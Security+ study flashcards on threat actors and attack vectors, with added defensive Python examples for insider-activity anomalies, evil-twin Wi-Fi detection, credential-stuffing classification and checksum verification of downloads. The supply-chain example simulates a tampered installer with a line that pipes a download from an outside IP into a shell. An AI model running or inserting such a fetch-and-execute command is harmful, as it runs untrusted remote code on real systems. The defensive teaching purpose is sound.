1.5 Explain different threat actors, vectors, and intelligence sources. Flashcards
Advanced persistent threat (APT)
-often associated wth Nation State Threat Actors
-well resourced/sophisticated perps engaged in targeted/prolonged net. + sys. intrusion
-infiltrate net. + remain inside undetected to get info over long period of time
-establish persistent access by:
->planting backdoors, creating privileged accts
Prevention
-regular patching
-employee training
-access ctrls
-threat intelligence sharing
Insider threats
-ppl wth legit access who intentionally/unintentionally harm orgs sec. (more than pswd on sticky notes)
-current/former employees, contractors, partners
-financial gain, revenge, ideology, negligence, competitive advantage
-unauthorized data access, data exfiltration, sabotage, sharing sensitive info, introducing malware
-could be malicious insiders or negligent insiders
Prevention
-behavioral assessments
-identify insiders exhibiting unusual behavior
-proper education/training
-policies to identify risky personnel
-proactive monitoring of net. and sys. activity
-usr access ctrls
-data encryption
-implement least privilege
-incident response plans
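Added example (not part of the flashcards): a small Python detector for the "proactive monitoring" and "behavior analysis" items above. It runs over constructed audit events and flags (1) activity outside business hours and (2) a day where a user's file-read count spikes against that user's own baseline. All users, paths, timestamps and the assumed 07:00-19:00 working hours are made up.

```python
from collections import defaultdict
from datetime import datetime

WORK_START, WORK_END = 7, 19  # assumed business hours (local time); tune per org

# Constructed audit events, not real logs: (iso timestamp, user, action, object).
# alice works normal hours, then pulls 40 finance files in one afternoon;
# bob logs in and reads an HR file at 02:41 on a weekday.
EVENTS = [
    ("2024-03-04T09:12:00", "alice", "login", "vpn"),
    ("2024-03-04T09:30:00", "alice", "read", "/share/finance/q1.xlsx"),
    ("2024-03-04T10:05:00", "alice", "read", "/share/finance/q2.xlsx"),
    ("2024-03-05T09:20:00", "alice", "read", "/share/finance/budget.xlsx"),
    ("2024-03-06T02:41:00", "bob", "login", "vpn"),
    ("2024-03-06T02:43:00", "bob", "read", "/share/hr/salaries.xlsx"),
] + [
    ("2024-03-07T14:%02d:00" % i, "alice", "read", "/share/finance/doc%02d.pdf" % i)
    for i in range(40)
]

def parse(raw):
    """Turn raw tuples into dicts with a parsed datetime."""
    return [{"ts": datetime.fromisoformat(ts), "user": u, "action": a, "obj": o}
            for ts, u, a, o in raw]

def off_hours(events):
    """Events on a weekend (weekday 5/6) or outside WORK_START..WORK_END."""
    hits = []
    for e in events:
        weekend = e["ts"].weekday() >= 5
        late = not (WORK_START <= e["ts"].hour < WORK_END)
        if weekend or late:
            hits.append((e["user"], e["ts"].isoformat(), e["action"], e["obj"]))
    return hits

def bulk_access(events, factor=3.0, min_reads=5):
    """Per user, flag any day whose read count is at least min_reads and at
    least factor times the mean of that user's other days (a crude personal
    baseline; a real deployment would use a longer history and peer groups)."""
    per_day = defaultdict(lambda: defaultdict(int))
    for e in events:
        if e["action"] == "read":
            per_day[e["user"]][e["ts"].date().isoformat()] += 1
    flagged = {}
    for user, days in per_day.items():
        for day, n in sorted(days.items()):
            others = [c for d, c in days.items() if d != day]
            baseline = sum(others) / len(others) if others else 0.0
            if n >= min_reads and n >= factor * baseline:
                flagged.setdefault(user, []).append(day)
    return flagged

def detect(raw=EVENTS):
    """Run both checks and return their findings."""
    ev = parse(raw)
    return {"off_hours": off_hours(ev), "bulk_access": bulk_access(ev)}

if __name__ == "__main__":
    for kind, hits in detect().items():
        print(kind, hits)
```

Both rules are deliberately simple; the point is that the baseline is per user, so alice's 40 reads are anomalous for her even though a data analyst might do that every day. Real tooling adds peer-group baselines and correlates with HR events (resignation, role change), which the notes list as motives.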
(Nation) State actors
-most sophisticated threat actor/wth most resources (labor force, time, $ to finance ongoing attcks)
-govt. sponsored/affiliated groups (govt. ties not always acknowledged)
-to achieve strategic objectives
-> military ctrl, utilities, financial ctrl, national sec., cyber espionage, cyber warfare, economic/political influence
-establish long term presence in compromised nets.
-> ongoing surveillance, gather intel, precursor/complement to conventional military actions
-custom malware/exploits tailored to targets
-can lead to: diplomatic tensions, sanctions, international agreements on cyber norms/rules of engagement
Prevention
-hard b/c use of false flags, proxies
-advanced threat protection
-attribution efforts
-international cooperation
Hacktivists
-ppl/groups engage in hacking 4 political, social, ideological reasons
-social change, political agenda
-can be sophisticated (DoS, website defacing, release of priv. docs., data leaks)
-limited funding BUT some have fundraising option
-operate anonymously/pseudonyms to conceal identity + avoid legal repercussions
-legal gray area b/c can be ethical protest and illegal hacking so subject to debate
-can lead to data breaches, services disruptions, reputational damage, financial losses
-usually gets media attn + public awareness
Detection
-intrusion detection
-proactive defense
-DDoS mitigation
-incident response plans
-robust sec. measures
Script kiddies
-ppl that use hacking techniques but have limited skills
-rely on preexisting hacking tools/scripts to conduct attcks
-unsophisticated BUT dangerous b/c unaware of consequences of their actions
-can’t cover tracks well, lack financial means
-target low hanging fruit (websites, online forums, poorly secured sys.)
-could be internal/external
-could plant trojans/remote access tools within org.
-often associated wth website defacement attcks
-motivations: curiosity, ego, attention seeking, vandalism, educational opportunity
Criminal syndicates
-prof. criminals motivated by $
-highly sophisticated, profit driven, diversified, widespread activity
-operate internationally
-has financial means
-illegal use of force, fraud, corruption, malware, social engineering, identity theft, CC fraud, sale of stolen data
-funding comes from other illegal acts (gambling, property theft, loan sharking, etc)
-contribute to underground cybercrime economy (sale of hacking tools, services, stolen data)
-money laundering makes them hard to trace
Prevention
-threat intel.
-international cooperation among law enforcement agencies
Hackers
-ppl/groups who use tech skills to gain authorized/unauthorized access to comp. sys., nets, data
-financial gain, curiosity, activism, mal intent, ego, ethical/sec. training (don’t always have mal. intent)
-targets = ppl, govts, critical infra
-three types = authorized, unauthorized, semi authorized
-methods = software vulns, social engineering, phishing, malware, pswd cracking
-impact = data breaches, financial losses, service disruptions, reputational damage 4 vics
Prevention
-regular patching
-usr training
-robust access ctrls
Authorized
-white hat
-ethical hackers/sec. researchers
-good intentions
-work wth consent of sys. owner to improve cybersec.
-pen testers wth permission to attack/test sys.
Unauthorized
-black hat
-mal. activities/intent
-cybercriminals
-4 personal gain, financial profit, steal data, distribute malware
Semi-authorized
-grey hat
-generally don’t have mal. intent
-operates in morally ambiguous area btwn black + white hat hackers
-may hack wthout permission
->expose vulns, may notify affected parties
-doesn't exploit the vuln. for gain > typically stops once they've found it (+ may report it)
Shadow IT
-use of unauthorized/unmanaged IT sys., apps, services within org.
->often wthout knowledge/approval from IT
-going rogue/working around internal IT
-employees might do this 4 convenience/more usr friendly to them
-unapproved sys. may lack proper sec. ctrls, updates, compliance wth org policies
-sensitive data could be exposed, mishandled, insecurely stored
-can lead to non compliance wth regulatory reqs/industry standards
->legal + financial penalties
-hard to monitor, secure, manage which makes it difficult to respond to sec. incidents
Prevention
-usr education
-policy enforcement
-provide approved alts
-collaboration btwn IT + end usrs
-usr friendly IT solutions
Competitors
-anticompetitive practices
-industrial espionage
-harm reputation
-gain economic benefits/steal financial info
-steal customer lists, product designs, pricing strats
-trade secrets, intellectual property, etc
-high level of sophistication + significant funding
-tactics = phishing, malware, social engineering, insider threats
Prevention
-data encryption
-access ctrls
-employee training
-threat intel.
Attributes of actors
-helps build better threat profiles + classification sys. to deploy relevant and proactive defenses
-helps assess their intent
Internal/external
Internal
-work on inside (sysadmins, end usrs)
-may not have motive/intent to cause harm
-have legit access = easier to carry out attcks wthout raising suspicion
-motives = financial gain, grievances, ideological beliefs, etc.
-actions often accidental
Mitigation
-advanced monitoring
-behavior analysis
-employee awareness programs
External
-operate from outside org.
-lack legit access to internal sys. (script kiddies, hacktivists, nation state actors, organized crime)
-resources @ disposal varies
-tech expertise varies
-motives = financial gain, political/ideological agendas, espionage targeting orgs IP/sensitive data
Mitigation
-consider ext. attck surface (net. perimeter safety)
-firewalls
-intrusion detection sys.
-threat intel.
Level of sophistication/capability
-technical ability
-access
-political/social support
-persistence
-financial means
-sophisticated TAs develop custom malware, tactics/techniques, advanced evasion techniques, patient/persistent
-for financial gain, political goal, espionage, ideological goals
Prevention
-requires advanced cybersec. measures
-threat intel.
-continuous monitoring
Resources/funding
-financial backing helps wth:
->access to tech > enhances effectiveness
->establish/maintain sophisticated infra (cmd + control servers, botnets, etc)
->custom development > malware, tools, techniques
->recruitment + retention of skilled hackers, researchers, etc. = expands TAs capabilities
-advanced hacking tools
-zero day exploits
-global reach
Prevention
-invest in cybersec. measures + threat intel.
Intent/motivation
-helps orgs assess risks, tailor defenses, respond effectively
-some accidental, others driven by financial gain/ideological reasons
-could be mal. (sabotage) wth aim to destroy data, steal info…
-insights into why they engage + what they aim to achieve
->financial profit, grievances, curiosity, power/influence
-intent influences tactics, techniques, targets
-competitive advantage
Prevention
-tailor defenses/responses according to intent + motivation
Vectors
-means that threat actors use to obtain access (path they take to execute attcks)
-a lot of work goes into finding vulns.
-delivery mechanisms
-evolve as tech. advances
-encompass range of techniques/strats
-important 4 proper risk analysis + understanding countermeasures
Direct access
-gain access to comp. sys, net., device, etc by physically entering orgs facilities (data center)
-bypassing traditional digital defenses = makes this highly effective
-could modify OS (reset admin pswd quickly)
-attach keylogger, transfer files, DoS, install malware, extract data, compromise sys., modify configs
-easily accessible location
->sitting + working on laptop which is connected to unsecured net. jacks on the wall
-may find unsecured computer terminal, net. device, sys.
-EX: lobby, public areas, customer store
Prevention
-physical sec. measures (access ctrl)
-surveillance
-tamper evident seals
-secure facility design
-restrict unauthorized physical access to critical sys.
-assume perp who is able to physically touch a component will be able to compromise that device
-physical sec. = v important
Wireless
-exploiting vulns. in wireless nets. + comm. tech.
-targets = wifi nets, bluetooth connections, cellular nets., etc.
-gain unauthorized access to wireless nets, intercept data, launch man in the middle, compromise connected devices
-default login creds > modify AP config
-evil twin > perp collects auth. details (on path attck)
-perps don’t need to gain physical access if they’re able to sit in parking lot + access ur orgs. wireless net.
-unsecured/poorly secured wireless nets. = big sec. risk
Mitigation
-strong encryption (WPA3 for wifi)
-disable unnecessary wireless services
-use secure pairing methods 4 bluetooth
-conduct reg. net. sec. assessments
-maintain up to date firmware + sec. patches
-monitor net. traffic
-use strong pswds 4 wireless access
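Added example (not part of the flashcards): a Python check for the evil-twin item above, of the kind a wireless IDS sensor or a periodic survey script would run. Given an allowlist of the BSSIDs and security mode that legitimately serve each corporate SSID, it flags any beacon that advertises a corporate SSID from an unknown radio, with weaker security than expected, or under a look-alike name. The SSIDs, BSSIDs, signal levels and the scan results are all constructed.

```python
# Assumed allowlist of what legitimately serves each corporate SSID (made up):
# SSID -> (set of legitimate BSSIDs, expected security mode)
KNOWN_APS = {
    "CorpNet":   ({"aa:bb:cc:00:01:10", "aa:bb:cc:00:01:11"}, "WPA3"),
    "CorpGuest": ({"aa:bb:cc:00:02:10"}, "WPA2"),
}

SECURITY_RANK = {"OPEN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}

# Constructed scan results (as a wardriving tool or a WIDS sensor might report):
# (ssid, bssid, security, signal dBm)
SCAN = [
    ("CorpNet",        "aa:bb:cc:00:01:10", "WPA3", -45),
    ("CorpNet",        "aa:bb:cc:00:01:11", "WPA3", -60),
    ("CorpNet",        "de:ad:be:ef:00:01", "OPEN", -38),  # evil twin: unknown radio, open, loudest
    ("CorpGuest",      "aa:bb:cc:00:02:10", "WPA2", -55),
    ("Corp-Net",       "de:ad:be:ef:00:02", "WPA2", -50),  # look-alike name
    ("Starbucks_Free", "11:22:33:44:55:66", "OPEN", -70),  # unrelated network
]

def normalize(ssid):
    """Collapse case and punctuation so 'Corp-Net' and 'corpnet' compare equal."""
    return "".join(ch for ch in ssid.lower() if ch.isalnum())

def audit_scan(scan, known=KNOWN_APS):
    """Return (finding, ssid, bssid, rssi) tuples for beacons that should not exist."""
    canon = {normalize(s): s for s in known}
    findings = []
    for ssid, bssid, sec, rssi in scan:
        bssid = bssid.lower()
        if ssid in known:
            legit_bssids, expected = known[ssid]
            if bssid not in legit_bssids:
                findings.append(("unknown_bssid", ssid, bssid, rssi))
            if SECURITY_RANK.get(sec, 0) < SECURITY_RANK[expected]:
                findings.append(("weaker_security", ssid, bssid, rssi))
        elif normalize(ssid) in canon:
            findings.append(("lookalike_ssid", ssid, bssid, rssi))
    # Strongest signal first: the evil twin is usually the loudest one in the room.
    return sorted(findings, key=lambda f: f[3], reverse=True)

if __name__ == "__main__":
    for f in audit_scan(SCAN):
        print(*f)
```

The allowlist is the important part: without a record of which BSSIDs are yours, a sensor cannot tell a new legitimate AP from a rogue one. The open "CorpNet" twin is also the loudest, which is exactly how a parking-lot attacker gets clients to prefer it over the real AP.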
Email
-methods used to compromise email accts 4 unauthorized access/conduct mal. activity
-biggest/most successful attck vector
-commonly exploited vector (phishing, spam, cred stuffing, brute force, pswd resets, email fwding rules, man in the middle, 2fa bypass, acct takeover, etc)
-deliver malware to usr (attch to msg)
-social engineering tactics
-can send mal. emails, steal sensitive data, conduct further attcks
-easy to execute
-can be launched on many usrs simultaneously
-only need to succeed one time
-perp needs login creds of one usr to begin attck
Prevention
-strong email sec. measures
-robust spam filters
-usr training on email sec. best practices
-enable mfa
-use strong/unique pswds
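Added example (not part of the flashcards): a Python classifier that separates two of the email-account attacks listed above, credential stuffing and brute force, from ordinary typos, using the shape of failed logins per source IP. Many distinct accounts from one IP with one or two tries each is stuffing (a leaked credential list being replayed); many tries against one account is brute force. A success from an IP already classified as attacking is reported as a probable account takeover. The auth events, IPs, usernames and thresholds are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed detection window
STUFFING_MIN_USERS = 5          # distinct accounts failed from one IP inside WINDOW
BRUTE_MIN_ATTEMPTS = 8          # failures against one account from one IP inside WINDOW

# Constructed webmail auth events, not real logs: (iso timestamp, source ip, user, result)
AUTH_EVENTS = (
    # 203.0.113.7 tries 12 different accounts once each (leaked-cred list); one works
    [("2024-03-04T08:00:%02d" % (i * 5), "203.0.113.7", "user%02d" % i, "fail") for i in range(12)]
    + [("2024-03-04T08:01:10", "203.0.113.7", "dan", "success")]
    # 198.51.100.9 hammers a single account every 20 seconds
    + [("2024-03-04T09:%02d:%02d" % divmod(i * 20, 60), "198.51.100.9", "erin", "fail") for i in range(15)]
    # 192.0.2.5 is a user who mistyped twice, then got in
    + [("2024-03-04T10:00:00", "192.0.2.5", "alice", "fail"),
       ("2024-03-04T10:00:30", "192.0.2.5", "alice", "fail"),
       ("2024-03-04T10:00:50", "192.0.2.5", "alice", "success")]
)

def classify(raw):
    """Per source IP, find the max distinct failed accounts and the max failures
    against one account inside any WINDOW, then label the IP."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in raw:
        by_ip[ip].append((datetime.fromisoformat(ts), user, result))
    verdicts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [(t, u) for t, u, r in evs if r == "fail"]
        distinct_users = per_user_max = 0
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > WINDOW:  # slide the window start
                start += 1
            window = fails[start:end + 1]
            distinct_users = max(distinct_users, len({u for _, u in window}))
            counts = defaultdict(int)
            for _, u in window:
                counts[u] += 1
            per_user_max = max(per_user_max, max(counts.values()))
        if distinct_users >= STUFFING_MIN_USERS:
            kind = "credential_stuffing"
        elif per_user_max >= BRUTE_MIN_ATTEMPTS:
            kind = "brute_force"
        else:
            kind = "benign"
        # Successful logins from an IP already flagged as attacking are likely takeovers
        successes = sorted({u for _, u, r in evs if r == "success"}) if kind != "benign" else []
        verdicts[ip] = {"kind": kind, "distinct_users": distinct_users,
                        "max_per_user": per_user_max, "successes": successes}
    return verdicts

if __name__ == "__main__":
    for ip, v in classify(AUTH_EVENTS).items():
        print(ip, v)
```

The distinction matters for response: a per-account lockout stops brute force but does nothing against stuffing, where each account sees only one attempt; stuffing needs per-IP rate limits, MFA and a check of leaked passwords. Real attackers spread stuffing across many IPs, so production detectors also aggregate on user agent, ASN and timing.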
Supply chain
-exploiting vulns. in org's supply chain/3rd party partners to gain unauthorized access + compromise sys. and data
-tamper wth underlying infra (EX: gain access to net. using a vendor)
-malware can modify manufacturing process
-counterfeit net. equipment > install backdoors, malware, vulns. into products b4 they reach end usr
-impersonate trusted suppliers/employees in supply chain
-social engineering, phishing, compromise updates/patch distribution process
-steal sensitive data, IP, trade secrets
-disrupt production/delivery of goods/services
->cause financial losses + reputational damage
Prevention
-rigorous vetting of 3rd party vendors
-implement sec. standards
-conduct reg. audits
-verify software/hardware integrity
-robust incident response plan
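Added example (not part of the flashcards): the "verify software/hardware integrity" item above, for software, in Python. The vendor side publishes a manifest of SHA-256 digests in sha256sum format; the consumer side recomputes each downloaded file's digest and compares in constant time, reporting tampered, missing and unlisted files. The release files, the manifest and the tampered download are all constructed. Note the assumption in the code: the manifest must arrive over a channel the mirror cannot tamper with (vendor HTTPS page, or a signed manifest), otherwise an attacker who swaps the file swaps the checksum too.

```python
import hashlib
import hmac

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def build_manifest(files: dict) -> str:
    """Vendor side: one '<sha256>  <filename>' line per released file (sha256sum format)."""
    return "".join(f"{sha256_hex(data)}  {name}\n" for name, data in sorted(files.items()))

def parse_manifest(text: str) -> dict:
    """Consumer side: filename -> expected digest; rejects malformed lines."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition("  ")
        if not sep or len(digest) != 64 or not name:
            raise ValueError(f"malformed manifest line: {line!r}")
        expected[name] = digest.lower()
    return expected

def verify(manifest_text: str, downloaded: dict) -> dict:
    """Return {filename: 'ok' | 'mismatch' | 'missing' | 'unlisted'}.
    compare_digest avoids a timing side channel on the comparison itself."""
    expected = parse_manifest(manifest_text)
    status = {}
    for name, digest in expected.items():
        if name not in downloaded:
            status[name] = "missing"
        elif hmac.compare_digest(sha256_hex(downloaded[name]), digest):
            status[name] = "ok"
        else:
            status[name] = "mismatch"
    for name in downloaded:
        if name not in expected:
            status[name] = "unlisted"
    return status

# Constructed release as the vendor built it (file contents are placeholders).
RELEASE = {
    "agent-1.4.2.tar.gz": b"\x1f\x8b constructed archive bytes",
    "agent-1.4.2-install.sh": b"#!/bin/sh\ncp agent /usr/local/bin/agent\n",
}
# Assumption: the manifest arrives over a separate trusted channel, not from
# the same mirror as the files.
MANIFEST = build_manifest(RELEASE)

# What a consumer pulled from a compromised mirror: the installer gained an extra
# line and an unlisted binary was bundled in (constructed tampering).
DOWNLOADED = dict(RELEASE)
DOWNLOADED["agent-1.4.2-install.sh"] += b"curl http://198.51.100.9/x | sh\n"
DOWNLOADED["extra-tool.bin"] = b"\x00\x01"

if __name__ == "__main__":
    for name, state in verify(MANIFEST, DOWNLOADED).items():
        print(f"{state:9} {name}")
```

Anything other than all-"ok" should abort the install, and "unlisted" is a finding in its own right, not noise: the notes' counterfeit-equipment and compromised-update cases are exactly files that were never in the vendor's manifest. Digest checks catch substitution; a signed manifest (GPG, Sigstore) is the stronger form because it also authenticates who published it.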
Social media
-exploits vuln. in ppl/orgs use of social media platforms
->where u are/when, vacay pics, usr profiling, where u were born, name of school mascot
-compromise sec/social media accts, conduct mal. activity, spread malware + spyware + trojans, identity theft, reputational damage, brand impersonation, data leakage
-perps might directly target usrs
-might use in effort to harvest info about usrs
Prevention
-ppl/orgs use strong + unique pswds
-enable 2fa
-educate usrs about social engineering risks
-regularly review privacy settings on accts
-usr education
Removable media
-using USB/etc. to spread malware
-might distribute in parking lots, airports, public areas in the hope that someone finds it + plugs into comp.
-device triggers malware infection that silently compromises vics comp. + places it under ctrl of the perp